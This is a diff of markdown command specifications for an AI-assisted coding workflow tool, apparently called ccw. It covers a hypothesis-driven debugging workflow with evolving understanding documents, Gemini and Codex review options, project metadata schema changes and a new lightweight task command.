|
||||
|
||||
Create `understanding.md` with exploration timeline:
|
||||
|
||||
```markdown
|
||||
# Understanding Document
|
||||
|
||||
**Session ID**: ${sessionId}
|
||||
**Bug Description**: ${bug_description}
|
||||
**Started**: ${getUtc8ISOString()}
|
||||
|
||||
---
|
||||
|
||||
## Exploration Timeline
|
||||
|
||||
### Iteration 1 - Initial Exploration (${timestamp})
|
||||
|
||||
#### Current Understanding
|
||||
|
||||
Based on bug description and initial code search:
|
||||
|
||||
- Error pattern: ${errorPattern}
|
||||
- Affected areas: ${affectedLocations.map(l => l.file).join(', ')}
|
||||
- Initial hypothesis: ${initialThoughts}
|
||||
|
||||
#### Evidence from Code Search
|
||||
|
||||
${searchResults.map(r => `
|
||||
**Keyword: "${r.keyword}"**
|
||||
- Found in: ${r.results.files.join(', ')}
|
||||
- Key findings: ${r.insights}
|
||||
`).join('\n')}
|
||||
|
||||
#### Next Steps
|
||||
|
||||
- Generate testable hypotheses
|
||||
- Add instrumentation
|
||||
- Await reproduction
|
||||
|
||||
---
|
||||
|
||||
## Current Consolidated Understanding
|
||||
|
||||
${initialConsolidatedUnderstanding}
|
||||
```
|
||||
|
||||
**Step 1.3: Gemini-Assisted Hypothesis Generation**
|
||||
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Generate debugging hypotheses for: ${bug_description}
|
||||
Success criteria: Testable hypotheses with clear evidence criteria
|
||||
|
||||
TASK:
|
||||
• Analyze error pattern and code search results
|
||||
• Identify 3-5 most likely root causes
|
||||
• For each hypothesis, specify:
|
||||
- What might be wrong
|
||||
- What evidence would confirm/reject it
|
||||
- Where to add instrumentation
|
||||
• Rank by likelihood
|
||||
|
||||
MODE: analysis
|
||||
|
||||
CONTEXT: @${sessionFolder}/understanding.md | Search results in understanding.md
|
||||
|
||||
EXPECTED:
|
||||
- Structured hypothesis list (JSON format)
|
||||
- Each hypothesis with: id, description, testable_condition, logging_point, evidence_criteria
|
||||
- Likelihood ranking (1=most likely)
|
||||
|
||||
CONSTRAINTS: Focus on testable conditions
|
||||
" --tool gemini --mode analysis --rule analysis-diagnose-bug-root-cause
|
||||
```
|
||||
|
||||
Save Gemini output to `hypotheses.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"iteration": 1,
|
||||
"timestamp": "2025-01-21T10:00:00+08:00",
|
||||
"hypotheses": [
|
||||
{
|
||||
"id": "H1",
|
||||
"description": "Data structure mismatch - expected key not present",
|
||||
"testable_condition": "Check if target key exists in dict",
|
||||
"logging_point": "file.py:func:42",
|
||||
"evidence_criteria": {
|
||||
"confirm": "data shows missing key",
|
||||
"reject": "key exists with valid value"
|
||||
},
|
||||
"likelihood": 1,
|
||||
"status": "pending"
|
||||
}
|
||||
],
|
||||
"gemini_insights": "...",
|
||||
"corrected_assumptions": []
|
||||
}
|
||||
```
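
Before instrumenting, it can be worth sanity-checking the saved file against the fields the analyze step relies on. A sketch, assuming `jq` is available; `${sessionFolder}` is the path computed during session setup:

```bash
jq -e '.hypotheses | length > 0 and all(has("id") and has("logging_point") and has("evidence_criteria"))' \
  "${sessionFolder}/hypotheses.json" || echo "hypotheses.json is missing required fields"
```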
|
||||
|
||||
**Step 1.4: Add NDJSON Instrumentation**
|
||||
|
||||
For each hypothesis, add logging (same as original debug command).
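
The exact instrumentation format is defined by `/workflow:debug`; for orientation, each reproduction should end up appending one JSON object per line to `debug.log`, keyed by hypothesis id, roughly like this (field names illustrative):

```bash
# Example of the kind of line the instrumented code should emit
printf '{"hid":"H1","ts":"%s","loc":"file.py:func:42","data":{"config":null,"exists":true}}\n' \
  "$(date -u +%FT%TZ)" >> "${sessionFolder}/debug.log"
```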
|
||||
|
||||
**Step 1.5: Update understanding.md**
|
||||
|
||||
Append hypothesis section:
|
||||
|
||||
```markdown
|
||||
#### Hypotheses Generated (Gemini-Assisted)
|
||||
|
||||
${hypotheses.map(h => `
|
||||
**${h.id}** (Likelihood: ${h.likelihood}): ${h.description}
|
||||
- Logging at: ${h.logging_point}
|
||||
- Testing: ${h.testable_condition}
|
||||
- Evidence to confirm: ${h.evidence_criteria.confirm}
|
||||
- Evidence to reject: ${h.evidence_criteria.reject}
|
||||
`).join('\n')}
|
||||
|
||||
**Gemini Insights**: ${geminiInsights}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Analyze Mode
|
||||
|
||||
**Step 2.1: Parse Debug Log**
|
||||
|
||||
```javascript
|
||||
// Parse NDJSON log
|
||||
const entries = Read(debugLogPath).split('\n')
|
||||
.filter(l => l.trim())
|
||||
.map(l => JSON.parse(l))
|
||||
|
||||
// Group by hypothesis
|
||||
const byHypothesis = groupBy(entries, 'hid')
|
||||
```
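
A quick way to eyeball the same grouping from the shell, assuming `jq` is installed:

```bash
# Slurp the NDJSON log and count entries per hypothesis id
jq -s 'group_by(.hid) | map({hid: .[0].hid, entries: length})' "${sessionFolder}/debug.log"
```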
|
||||
|
||||
**Step 2.2: Gemini-Assisted Evidence Analysis**
|
||||
|
||||
```bash
|
||||
ccw cli -p "
|
||||
PURPOSE: Analyze debug log evidence to validate/correct hypotheses for: ${bug_description}
|
||||
Success criteria: Clear verdict per hypothesis + corrected understanding
|
||||
|
||||
TASK:
|
||||
• Parse log entries by hypothesis
|
||||
• Evaluate evidence against expected criteria
|
||||
• Determine verdict: confirmed | rejected | inconclusive
|
||||
• Identify incorrect assumptions from previous understanding
|
||||
• Suggest corrections to understanding
|
||||
|
||||
MODE: analysis
|
||||
|
||||
CONTEXT:
|
||||
@${debugLogPath}
|
||||
@${understandingPath}
|
||||
@${hypothesesPath}
|
||||
|
||||
EXPECTED:
|
||||
- Per-hypothesis verdict with reasoning
|
||||
- Evidence summary
|
||||
- List of incorrect assumptions with corrections
|
||||
- Updated consolidated understanding
|
||||
- Root cause if confirmed, or next investigation steps
|
||||
|
||||
CONSTRAINTS: Evidence-based reasoning only, no speculation
|
||||
" --tool gemini --mode analysis --rule analysis-diagnose-bug-root-cause
|
||||
```
|
||||
|
||||
**Step 2.3: Update Understanding with Corrections**
|
||||
|
||||
Append new iteration to `understanding.md`:
|
||||
|
||||
```markdown
|
||||
### Iteration ${n} - Evidence Analysis (${timestamp})
|
||||
|
||||
#### Log Analysis Results
|
||||
|
||||
${results.map(r => `
|
||||
**${r.id}**: ${r.verdict.toUpperCase()}
|
||||
- Evidence: ${JSON.stringify(r.evidence)}
|
||||
- Reasoning: ${r.reason}
|
||||
`).join('\n')}
|
||||
|
||||
#### Corrected Understanding
|
||||
|
||||
Previous misunderstandings identified and corrected:
|
||||
|
||||
${corrections.map(c => `
|
||||
- ~~${c.wrong}~~ → ${c.corrected}
|
||||
- Why wrong: ${c.reason}
|
||||
- Evidence: ${c.evidence}
|
||||
`).join('\n')}
|
||||
|
||||
#### New Insights
|
||||
|
||||
${newInsights.join('\n- ')}
|
||||
|
||||
#### Gemini Analysis
|
||||
|
||||
${geminiAnalysis}
|
||||
|
||||
${confirmedHypothesis ? `
|
||||
#### Root Cause Identified
|
||||
|
||||
**${confirmedHypothesis.id}**: ${confirmedHypothesis.description}
|
||||
|
||||
Evidence supporting this conclusion:
|
||||
${confirmedHypothesis.supportingEvidence}
|
||||
` : `
|
||||
#### Next Steps
|
||||
|
||||
${nextSteps}
|
||||
`}
|
||||
|
||||
---
|
||||
|
||||
## Current Consolidated Understanding (Updated)
|
||||
|
||||
${consolidatedUnderstanding}
|
||||
```
|
||||
|
||||
**Step 2.4: Consolidate Understanding**
|
||||
|
||||
At the bottom of `understanding.md`, update the consolidated section:
|
||||
|
||||
- Remove or simplify proven-wrong assumptions
|
||||
- Keep them in strikethrough for reference
|
||||
- Focus on current valid understanding
|
||||
- Avoid repeating details from timeline
|
||||
|
||||
```markdown
|
||||
## Current Consolidated Understanding
|
||||
|
||||
### What We Know
|
||||
|
||||
- ${validUnderstanding1}
|
||||
- ${validUnderstanding2}
|
||||
|
||||
### What Was Disproven
|
||||
|
||||
- ~~Initial assumption: ${wrongAssumption}~~ (Evidence: ${disproofEvidence})
|
||||
|
||||
### Current Investigation Focus
|
||||
|
||||
${currentFocus}
|
||||
|
||||
### Remaining Questions
|
||||
|
||||
- ${openQuestion1}
|
||||
- ${openQuestion2}
|
||||
```
|
||||
|
||||
**Step 2.5: Update hypotheses.json**
|
||||
|
||||
```json
|
||||
{
|
||||
"iteration": 2,
|
||||
"timestamp": "2025-01-21T10:15:00+08:00",
|
||||
"hypotheses": [
|
||||
{
|
||||
"id": "H1",
|
||||
"status": "rejected",
|
||||
"verdict_reason": "Evidence shows key exists with valid value",
|
||||
"evidence": {...}
|
||||
},
|
||||
{
|
||||
"id": "H2",
|
||||
"status": "confirmed",
|
||||
"verdict_reason": "Log data confirms timing issue",
|
||||
"evidence": {...}
|
||||
}
|
||||
],
|
||||
"gemini_corrections": [
|
||||
{
|
||||
"wrong_assumption": "...",
|
||||
"corrected_to": "...",
|
||||
"reason": "..."
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Fix & Verification
|
||||
|
||||
**Step 3.1: Apply Fix**
|
||||
|
||||
(Same as original debug command)
|
||||
|
||||
**Step 3.2: Document Resolution**
|
||||
|
||||
Append to `understanding.md`:
|
||||
|
||||
```markdown
|
||||
### Iteration ${n} - Resolution (${timestamp})
|
||||
|
||||
#### Fix Applied
|
||||
|
||||
- Modified files: ${modifiedFiles.join(', ')}
|
||||
- Fix description: ${fixDescription}
|
||||
- Root cause addressed: ${rootCause}
|
||||
|
||||
#### Verification Results
|
||||
|
||||
${verificationResults}
|
||||
|
||||
#### Lessons Learned
|
||||
|
||||
What we learned from this debugging session:
|
||||
|
||||
1. ${lesson1}
|
||||
2. ${lesson2}
|
||||
3. ${lesson3}
|
||||
|
||||
#### Key Insights for Future
|
||||
|
||||
- ${insight1}
|
||||
- ${insight2}
|
||||
```
|
||||
|
||||
**Step 3.3: Cleanup**
|
||||
|
||||
Remove debug instrumentation (same as original command).
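
One hedged way to double-check nothing was left behind is to search for the session id, assuming the instrumentation lines were tagged with it when inserted (the actual marker convention comes from `/workflow:debug`, so adjust the pattern accordingly):

```bash
# Any file still containing the session id likely has leftover debug logging
grep -rln "${sessionId}" src/ || echo "No leftover instrumentation found"
```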
|
||||
|
||||
---
|
||||
|
||||
## Session Folder Structure
|
||||
|
||||
```
|
||||
.workflow/.debug/DBG-{slug}-{date}/
|
||||
├── debug.log # NDJSON log (execution evidence)
|
||||
├── understanding.md # NEW: Exploration timeline + consolidated understanding
|
||||
├── hypotheses.json # NEW: Hypothesis history with verdicts
|
||||
└── resolution.md # Optional: Final summary
|
||||
```
|
||||
|
||||
## Understanding Document Template
|
||||
|
||||
```markdown
|
||||
# Understanding Document
|
||||
|
||||
**Session ID**: DBG-xxx-2025-01-21
|
||||
**Bug Description**: [original description]
|
||||
**Started**: 2025-01-21T10:00:00+08:00
|
||||
|
||||
---
|
||||
|
||||
## Exploration Timeline
|
||||
|
||||
### Iteration 1 - Initial Exploration (2025-01-21 10:00)
|
||||
|
||||
#### Current Understanding
|
||||
...
|
||||
|
||||
#### Evidence from Code Search
|
||||
...
|
||||
|
||||
#### Hypotheses Generated (Gemini-Assisted)
|
||||
...
|
||||
|
||||
### Iteration 2 - Evidence Analysis (2025-01-21 10:15)
|
||||
|
||||
#### Log Analysis Results
|
||||
...
|
||||
|
||||
#### Corrected Understanding
|
||||
- ~~[wrong]~~ → [corrected]
|
||||
|
||||
#### Gemini Analysis
|
||||
...
|
||||
|
||||
---
|
||||
|
||||
## Current Consolidated Understanding
|
||||
|
||||
### What We Know
|
||||
- [valid understanding points]
|
||||
|
||||
### What Was Disproven
|
||||
- ~~[disproven assumptions]~~
|
||||
|
||||
### Current Investigation Focus
|
||||
[current focus]
|
||||
|
||||
### Remaining Questions
|
||||
- [open questions]
|
||||
```
|
||||
|
||||
## Iteration Flow
|
||||
|
||||
```
|
||||
First Call (/workflow:debug-with-file "error"):
|
||||
├─ No session exists → Explore mode
|
||||
├─ Extract error keywords, search codebase
|
||||
├─ Document initial understanding in understanding.md
|
||||
├─ Use Gemini to generate hypotheses
|
||||
├─ Add logging instrumentation
|
||||
└─ Await user reproduction
|
||||
|
||||
After Reproduction (/workflow:debug-with-file "error"):
|
||||
├─ Session exists + debug.log has content → Analyze mode
|
||||
├─ Parse log, use Gemini to evaluate hypotheses
|
||||
├─ Update understanding.md with:
|
||||
│ ├─ Evidence analysis results
|
||||
│ ├─ Corrected misunderstandings (strikethrough)
|
||||
│ ├─ New insights
|
||||
│ └─ Updated consolidated understanding
|
||||
├─ Update hypotheses.json with verdicts
|
||||
└─ Decision:
|
||||
├─ Confirmed → Fix → Document resolution
|
||||
├─ Inconclusive → Add logging, document next steps
|
||||
└─ All rejected → Gemini-assisted new hypotheses
|
||||
|
||||
Output:
|
||||
├─ .workflow/.debug/DBG-{slug}-{date}/debug.log
|
||||
├─ .workflow/.debug/DBG-{slug}-{date}/understanding.md (evolving document)
|
||||
└─ .workflow/.debug/DBG-{slug}-{date}/hypotheses.json (history)
|
||||
```
|
||||
|
||||
## Gemini Integration Points
|
||||
|
||||
### 1. Hypothesis Generation (Explore Mode)
|
||||
|
||||
**Purpose**: Generate evidence-based, testable hypotheses
|
||||
|
||||
**Prompt Pattern**:
|
||||
```
|
||||
PURPOSE: Generate debugging hypotheses + evidence criteria
|
||||
TASK: Analyze error + code → testable hypotheses with clear pass/fail criteria
|
||||
CONTEXT: @understanding.md (search results)
|
||||
EXPECTED: JSON with hypotheses, likelihood ranking, evidence criteria
|
||||
```
|
||||
|
||||
### 2. Evidence Analysis (Analyze Mode)
|
||||
|
||||
**Purpose**: Validate hypotheses and correct misunderstandings
|
||||
|
||||
**Prompt Pattern**:
|
||||
```
|
||||
PURPOSE: Analyze debug log evidence + correct understanding
|
||||
TASK: Evaluate each hypothesis → identify wrong assumptions → suggest corrections
|
||||
CONTEXT: @debug.log @understanding.md @hypotheses.json
|
||||
EXPECTED: Verdicts + corrections + updated consolidated understanding
|
||||
```
|
||||
|
||||
### 3. New Hypothesis Generation (After All Rejected)
|
||||
|
||||
**Purpose**: Generate new hypotheses based on what was disproven
|
||||
|
||||
**Prompt Pattern**:
|
||||
```
|
||||
PURPOSE: Generate new hypotheses given disproven assumptions
|
||||
TASK: Review rejected hypotheses → identify knowledge gaps → new investigation angles
|
||||
CONTEXT: @understanding.md (with disproven section) @hypotheses.json
|
||||
EXPECTED: New hypotheses avoiding previously rejected paths
|
||||
```
|
||||
|
||||
## Error Correction Mechanism
|
||||
|
||||
### Correction Format in understanding.md
|
||||
|
||||
```markdown
|
||||
#### Corrected Understanding
|
||||
|
||||
- ~~Assumed dict key "config" was missing~~ → Key exists, but value is None
|
||||
- Why wrong: Only checked existence, not value validity
|
||||
- Evidence: H1 log shows {"config": null, "exists": true}
|
||||
|
||||
- ~~Thought error occurred in initialization~~ → Error happens during runtime update
|
||||
- Why wrong: Stack trace misread as init code
|
||||
- Evidence: H2 timestamp shows 30s after startup
|
||||
```
|
||||
|
||||
### Consolidation Rules
|
||||
|
||||
When updating "Current Consolidated Understanding":
|
||||
|
||||
1. **Simplify disproven items**: Move to "What Was Disproven" with single-line summary
|
||||
2. **Keep valid insights**: Promote confirmed findings to "What We Know"
|
||||
3. **Avoid duplication**: Don't repeat timeline details in consolidated section
|
||||
4. **Focus on current state**: What do we know NOW, not the journey
|
||||
5. **Preserve key corrections**: Keep important wrong→right transformations for learning
|
||||
|
||||
**Bad (cluttered)**:
|
||||
```markdown
|
||||
## Current Consolidated Understanding
|
||||
|
||||
In iteration 1 we thought X, but in iteration 2 we found Y, then in iteration 3...
|
||||
Also we checked A and found B, and then we checked C...
|
||||
```
|
||||
|
||||
**Good (consolidated)**:
|
||||
```markdown
|
||||
## Current Consolidated Understanding
|
||||
|
||||
### What We Know
|
||||
- Error occurs during runtime update, not initialization
|
||||
- Config value is None (not missing key)
|
||||
|
||||
### What Was Disproven
|
||||
- ~~Initialization error~~ (Timing evidence)
|
||||
- ~~Missing key hypothesis~~ (Key exists)
|
||||
|
||||
### Current Investigation Focus
|
||||
Why is config value None during update?
|
||||
```
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); for each selected dimension, call `/issue:new "{summary} - {dimension}"`.
|
||||
|
||||
---
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Situation | Action |
|
||||
|-----------|--------|
|
||||
| Empty debug.log | Verify reproduction triggered the code path |
|
||||
| All hypotheses rejected | Use Gemini to generate new hypotheses based on disproven assumptions |
|
||||
| Fix doesn't work | Document failed fix attempt, iterate with refined understanding |
|
||||
| >5 iterations | Review consolidated understanding, escalate to `/workflow:lite-fix` with full context |
|
||||
| Gemini unavailable | Fallback to manual hypothesis generation, document without Gemini insights |
|
||||
| Understanding too long | Consolidate aggressively, archive old iterations to separate file |
|
||||
|
||||
## Comparison with /workflow:debug
|
||||
|
||||
| Feature | /workflow:debug | /workflow:debug-with-file |
|
||||
|---------|-----------------|---------------------------|
|
||||
| NDJSON logging | ✅ | ✅ |
|
||||
| Hypothesis generation | Manual | Gemini-assisted |
|
||||
| Exploration documentation | ❌ | ✅ understanding.md |
|
||||
| Understanding evolution | ❌ | ✅ Timeline + corrections |
|
||||
| Error correction | ❌ | ✅ Strikethrough + reasoning |
|
||||
| Consolidated learning | ❌ | ✅ Current understanding section |
|
||||
| Hypothesis history | ❌ | ✅ hypotheses.json |
|
||||
| Gemini validation | ❌ | ✅ At key decision points |
|
||||
|
||||
## Usage Recommendations
|
||||
|
||||
Use `/workflow:debug-with-file` when:
|
||||
- Complex bugs requiring multiple investigation rounds
|
||||
- Learning from debugging process is valuable
|
||||
- Team needs to understand debugging rationale
|
||||
- Bug might recur, documentation helps prevention
|
||||
|
||||
Use `/workflow:debug` when:
|
||||
- Simple, quick bugs
|
||||
- One-off issues
|
||||
- Documentation overhead not needed
|
||||
@@ -311,6 +311,12 @@ Output:
|
||||
└─ .workflow/.debug/DBG-{slug}-{date}/debug.log
|
||||
```
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); for each selected dimension, call `/issue:new "{summary} - {dimension}"`.
|
||||
|
||||
---
|
||||
|
||||
## Error Handling
|
||||
|
||||
| Situation | Action |
|
||||
|
||||
@@ -275,6 +275,10 @@ AskUserQuestion({
|
||||
- **"Enter Review"**: Execute `/workflow:review`
|
||||
- **"Complete Session"**: Execute `/workflow:session:complete`
|
||||
|
||||
### Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); for each selected dimension, call `/issue:new "{summary} - {dimension}"`.
|
||||
|
||||
## Execution Strategy (IMPL_PLAN-Driven)
|
||||
|
||||
### Strategy Priority
|
||||
|
||||
@@ -108,11 +108,24 @@ Analyze project for workflow initialization and generate .workflow/project-tech.
|
||||
2. Execute: ccw tool exec get_modules_by_depth '{}' (get project structure)
|
||||
|
||||
## Task
|
||||
Generate complete project-tech.json with:
|
||||
- project_metadata: {name: ${projectName}, root_path: ${projectRoot}, initialized_at, updated_at}
|
||||
- technology_analysis: {description, languages, frameworks, build_tools, test_frameworks, architecture, key_components, dependencies}
|
||||
- development_status: ${regenerate ? 'preserve from backup' : '{completed_features: [], development_index: {feature: [], enhancement: [], bugfix: [], refactor: [], docs: []}, statistics: {total_features: 0, total_sessions: 0, last_updated}}'}
|
||||
- _metadata: {initialized_by: "cli-explore-agent", analysis_timestamp, analysis_mode}
|
||||
Generate complete project-tech.json following the schema structure:
|
||||
- project_name: "${projectName}"
|
||||
- initialized_at: ISO 8601 timestamp
|
||||
- overview: {
|
||||
description: "Brief project description",
|
||||
technology_stack: {
|
||||
languages: [{name, file_count, primary}],
|
||||
frameworks: ["string"],
|
||||
build_tools: ["string"],
|
||||
test_frameworks: ["string"]
|
||||
},
|
||||
architecture: {style, layers: [], patterns: []},
|
||||
key_components: [{name, path, description, importance}]
|
||||
}
|
||||
- features: []
|
||||
- development_index: ${regenerate ? 'preserve from backup' : '{feature: [], enhancement: [], bugfix: [], refactor: [], docs: []}'}
|
||||
- statistics: ${regenerate ? 'preserve from backup' : '{total_features: 0, total_sessions: 0, last_updated: ISO timestamp}'}
|
||||
- _metadata: {initialized_by: "cli-explore-agent", analysis_timestamp: ISO timestamp, analysis_mode: "deep-scan"}
|
||||
|
||||
## Analysis Requirements
|
||||
|
||||
@@ -132,7 +145,7 @@ Generate complete project-tech.json with:
|
||||
1. Structural scan: get_modules_by_depth.sh, find, wc -l
|
||||
2. Semantic analysis: Gemini for patterns/architecture
|
||||
3. Synthesis: Merge findings
|
||||
4. ${regenerate ? 'Merge with preserved development_status from .workflow/project-tech.json.backup' : ''}
|
||||
4. ${regenerate ? 'Merge with preserved development_index and statistics from .workflow/project-tech.json.backup' : ''}
|
||||
5. Write JSON: Write('.workflow/project-tech.json', jsonContent)
|
||||
6. Report: Return brief completion summary
|
||||
|
||||
@@ -181,16 +194,16 @@ console.log(`
|
||||
✓ Project initialized successfully
|
||||
|
||||
## Project Overview
|
||||
Name: ${projectTech.project_metadata.name}
|
||||
Description: ${projectTech.technology_analysis.description}
|
||||
Name: ${projectTech.project_name}
|
||||
Description: ${projectTech.overview.description}
|
||||
|
||||
### Technology Stack
|
||||
Languages: ${projectTech.technology_analysis.languages.map(l => l.name).join(', ')}
|
||||
Frameworks: ${projectTech.technology_analysis.frameworks.join(', ')}
|
||||
Languages: ${projectTech.overview.technology_stack.languages.map(l => l.name).join(', ')}
|
||||
Frameworks: ${projectTech.overview.technology_stack.frameworks.join(', ')}
|
||||
|
||||
### Architecture
|
||||
Style: ${projectTech.technology_analysis.architecture.style}
|
||||
Components: ${projectTech.technology_analysis.key_components.length} core modules
|
||||
Style: ${projectTech.overview.architecture.style}
|
||||
Components: ${projectTech.overview.key_components.length} core modules
|
||||
|
||||
---
|
||||
Files created:
|
||||
|
||||
@@ -81,6 +81,7 @@ AskUserQuestion({
|
||||
options: [
|
||||
{ label: "Skip", description: "No review" },
|
||||
{ label: "Gemini Review", description: "Gemini CLI tool" },
|
||||
{ label: "Codex Review", description: "Git-aware review (prompt OR --uncommitted)" },
|
||||
{ label: "Agent Review", description: "Current agent review" }
|
||||
]
|
||||
}
|
||||
@@ -171,10 +172,23 @@ Output:
|
||||
**Operations**:
|
||||
- Initialize result tracking for multi-execution scenarios
|
||||
- Set up `previousExecutionResults` array for context continuity
|
||||
- **In-Memory Mode**: Echo execution strategy from lite-plan for transparency
|
||||
|
||||
```javascript
|
||||
// Initialize result tracking
|
||||
previousExecutionResults = []
|
||||
|
||||
// In-Memory Mode: Echo execution strategy (transparency before execution)
|
||||
if (executionContext) {
|
||||
console.log(`
|
||||
📋 Execution Strategy (from lite-plan):
|
||||
Method: ${executionContext.executionMethod}
|
||||
Review: ${executionContext.codeReviewTool}
|
||||
Tasks: ${executionContext.planObject.tasks.length}
|
||||
Complexity: ${executionContext.planObject.complexity}
|
||||
${executionContext.executorAssignments ? ` Assignments: ${JSON.stringify(executionContext.executorAssignments)}` : ''}
|
||||
`)
|
||||
}
|
||||
```
|
||||
|
||||
### Step 2: Task Grouping & Batch Creation
|
||||
@@ -392,16 +406,8 @@ ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write
|
||||
|
||||
**Execution with fixed IDs** (predictable ID pattern):
|
||||
```javascript
|
||||
// Launch CLI in foreground (NOT background)
|
||||
// Timeout based on complexity: Low=40min, Medium=60min, High=100min
|
||||
const timeoutByComplexity = {
|
||||
"Low": 2400000, // 40 minutes
|
||||
"Medium": 3600000, // 60 minutes
|
||||
"High": 6000000 // 100 minutes
|
||||
}
|
||||
|
||||
// Launch CLI in background, wait for task hook callback
|
||||
// Generate fixed execution ID: ${sessionId}-${groupId}
|
||||
// This enables predictable ID lookup without relying on resume context chains
|
||||
const sessionId = executionContext?.session?.id || 'standalone'
|
||||
const fixedExecutionId = `${sessionId}-${batch.groupId}` // e.g., "implement-auth-2025-12-13-P1"
|
||||
|
||||
@@ -413,16 +419,12 @@ const cli_command = previousCliId
|
||||
? `ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write --id ${fixedExecutionId} --resume ${previousCliId}`
|
||||
: `ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write --id ${fixedExecutionId}`
|
||||
|
||||
bash_result = Bash(
|
||||
// Execute in background, stop output and wait for task hook callback
|
||||
Bash(
|
||||
command=cli_command,
|
||||
timeout=timeoutByComplexity[planObject.complexity] || 3600000
|
||||
run_in_background=true
|
||||
)
|
||||
|
||||
// Execution ID is now predictable: ${fixedExecutionId}
|
||||
// Can also extract from output: "ID: implement-auth-2025-12-13-P1"
|
||||
const cliExecutionId = fixedExecutionId
|
||||
|
||||
// Update TodoWrite when execution completes
|
||||
// STOP HERE - CLI executes in background, task hook will notify on completion
|
||||
```
|
||||
|
||||
**Resume on Failure** (with fixed ID):
|
||||
@@ -469,7 +471,8 @@ Progress tracked at batch level (not individual task level). Icons: ⚡ (paralle
|
||||
**Operations**:
|
||||
- Agent Review: Current agent performs direct review
|
||||
- Gemini Review: Execute gemini CLI with review prompt
|
||||
- Custom tool: Execute specified CLI tool (qwen, codex, etc.)
|
||||
- Codex Review: Two options - (A) with prompt for complex reviews, (B) `--uncommitted` flag only for quick reviews
|
||||
- Custom tool: Execute specified CLI tool (qwen, etc.)
|
||||
|
||||
**Unified Review Template** (All tools use same standard):
|
||||
|
||||
@@ -485,7 +488,7 @@ TASK: • Verify plan acceptance criteria fulfillment • Analyze code quality
|
||||
MODE: analysis
|
||||
CONTEXT: @**/* @{plan.json} [@{exploration.json}] | Memory: Review lite-execute changes against plan requirements
|
||||
EXPECTED: Quality assessment with acceptance criteria verification, issue identification, and recommendations. Explicitly check each acceptance criterion from plan.json tasks.
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/prompts/analysis/02-review-code-quality.txt) | Focus on plan acceptance criteria and plan adherence | analysis=READ-ONLY
|
||||
CONSTRAINTS: Focus on plan acceptance criteria and plan adherence | analysis=READ-ONLY
|
||||
```
|
||||
|
||||
**Tool-Specific Execution** (Apply shared prompt template above):
|
||||
@@ -504,8 +507,17 @@ ccw cli -p "[Shared Prompt Template with artifacts]" --tool gemini --mode analys
|
||||
ccw cli -p "[Shared Prompt Template with artifacts]" --tool qwen --mode analysis
|
||||
# Same prompt as Gemini, different execution engine
|
||||
|
||||
# Method 4: Codex Review (autonomous)
|
||||
ccw cli -p "[Verify plan acceptance criteria at ${plan.json}]" --tool codex --mode write
|
||||
# Method 4: Codex Review (git-aware) - Two mutually exclusive options:
|
||||
|
||||
# Option A: With custom prompt (reviews uncommitted by default)
|
||||
ccw cli -p "[Shared Prompt Template with artifacts]" --tool codex --mode review
|
||||
# Use for complex reviews with specific focus areas
|
||||
|
||||
# Option B: Target flag only (no prompt allowed)
|
||||
ccw cli --tool codex --mode review --uncommitted
|
||||
# Quick review of uncommitted changes without custom instructions
|
||||
|
||||
# ⚠️ IMPORTANT: -p prompt and target flags (--uncommitted/--base/--commit) are MUTUALLY EXCLUSIVE
|
||||
```
|
||||
|
||||
**Multi-Round Review with Fixed IDs**:
|
||||
@@ -531,11 +543,11 @@ if (hasUnresolvedIssues(reviewResult)) {
|
||||
|
||||
**Trigger**: After all executions complete (regardless of code review)
|
||||
|
||||
**Skip Condition**: Skip if `.workflow/project.json` does not exist
|
||||
**Skip Condition**: Skip if `.workflow/project-tech.json` does not exist
|
||||
|
||||
**Operations**:
|
||||
```javascript
|
||||
const projectJsonPath = '.workflow/project.json'
|
||||
const projectJsonPath = '.workflow/project-tech.json'
|
||||
if (!fileExists(projectJsonPath)) return // Silent skip
|
||||
|
||||
const projectJson = JSON.parse(Read(projectJsonPath))
|
||||
@@ -664,6 +676,10 @@ Collected after each execution call completes:
|
||||
|
||||
Appended to `previousExecutionResults` array for context continuity in multi-execution scenarios.
|
||||
|
||||
## Post-Completion Expansion
|
||||
|
||||
After completion, ask the user whether to expand the work into follow-up issues (test/enhance/refactor/doc); for each selected dimension, call `/issue:new "{summary} - {dimension}"`.
|
||||
|
||||
**Fixed ID Pattern**: `${sessionId}-${groupId}` enables predictable lookup without auto-generated timestamps.
|
||||
|
||||
**Resume Usage**: If `status` is "partial" or "failed", use `fixedCliId` to resume:
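A hedged sketch of the resume call, reusing the `--resume` flag and background-execution pattern shown above (exact flags depend on your ccw configuration):

```javascript
// Sketch: resume a partial/failed execution using the fixed ID
Bash({
  command: `ccw cli -p "${buildExecutionPrompt(batch)}" --tool codex --mode write --resume ${fixedCliId}`,
  run_in_background: true
})
// Stop here as usual - the task hook reports completion
```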
|
||||
|
||||
.claude/commands/workflow/lite-lite-lite.md (new file, 461 lines)
@@ -0,0 +1,461 @@
|
||||
---
|
||||
name: workflow:lite-lite-lite
|
||||
description: Ultra-lightweight multi-tool analysis and direct execution. No artifacts for simple tasks; auto-creates planning docs in .workflow/.scratchpad/ for complex tasks. Auto tool selection based on task analysis, user-driven iteration via AskUser.
|
||||
argument-hint: "<task description>"
|
||||
allowed-tools: TodoWrite(*), Task(*), AskUserQuestion(*), Read(*), Bash(*), Write(*), mcp__ace-tool__search_context(*), mcp__ccw-tools__write_file(*)
|
||||
---
|
||||
|
||||
# Ultra-Lite Multi-Tool Workflow
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
/workflow:lite-lite-lite "Fix the login bug"
|
||||
/workflow:lite-lite-lite "Refactor payment module for multi-gateway support"
|
||||
```
|
||||
|
||||
**Core Philosophy**: Minimal friction, maximum velocity. Simple tasks = no artifacts. Complex tasks = lightweight planning doc in `.workflow/.scratchpad/`.
|
||||
|
